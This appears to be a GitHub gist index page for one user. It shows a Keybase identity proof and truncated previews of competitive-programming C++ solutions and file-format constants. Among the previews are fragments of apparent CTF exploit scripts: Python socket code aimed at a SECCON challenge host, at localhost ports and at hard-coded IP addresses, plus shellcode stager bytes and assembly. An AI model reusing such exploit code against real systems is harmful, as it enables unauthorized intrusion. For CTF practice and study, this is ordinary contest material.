Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am potetisensei on github.
  • I am potetisensei (https://keybase.io/potetisensei) on keybase.
  • I have a public key whose fingerprint is F904 B5AC 2463 23DF 0967 9D3A 74CB 3C57 3D7D D7E1

To claim this, I am signing this object:

from socket import *
from time import time, sleep
from struct import pack
from sys import argv
if len(argv) >= 2:
HOST = "107.189.94.25"
else :
HOST = "192.168.174.165"
OFFSET = 1
@potetisensei
potetisensei / 3689.cpp
Last active February 12, 2017 07:17
POJ 3689
#include <cstdio>
#include <cstring>
#include <cmath>
#include <cassert>
#include <algorithm>
using namespace std;
#define EPS 1e-8
#define INF 1e10
@potetisensei
potetisensei / 1328.cpp
Last active August 29, 2015 14:14
POJ 1328
#include <cstdio>
#include <cmath>
#include <utility>
#include <algorithm>
using namespace std;
#define EPS (1e-6)
typedef pair<long double, long double> Coor;
typedef pair<long double, Coor> Pair;
#include <cstdio>
#include <vector>
#include <set>
#include <utility>
#include <algorithm>
using namespace std;
int n;
pair<int, long long int> microbe[300000]; // 微生物の値(b, a)のpair
FB_MAGIC = 0x4246
OV_MAGIC = 0x564F
SI_COD = 0x0001
SI_OVR = 0x0002
SI_DAT = 0x0004
STUBUNK_SIZE = (0x20-0x10)
ovr_noexe = 0
ovr_pascal = 1
ovr_cpp = 2
from socket import *
from struct import pack, unpack
from commands import getoutput
from time import sleep
buf_clone = 0x080CB960
p = socket(AF_INET, SOCK_STREAM)
p.connect(("ropi.pwn.seccon.jp", 10000))
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10013))
prefix = "\xf2\xf3"
stager = ""
stager += prefix * 2 + "\x90"
stager += "\x66\xC7\x44\x24\x14\xFF\xFF"
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10015))
prefix = "\xf2\xf3"
stager = ""
stager += "\x66\xC7\x44\x24\x14\xFF\xFF"
stager += prefix + "\xA3\x44\x91\x04\x08"
BITS 32
mov word [esp+0x14], 0xffff
mov [0x08049144], eax
push 0x08048C0A
ret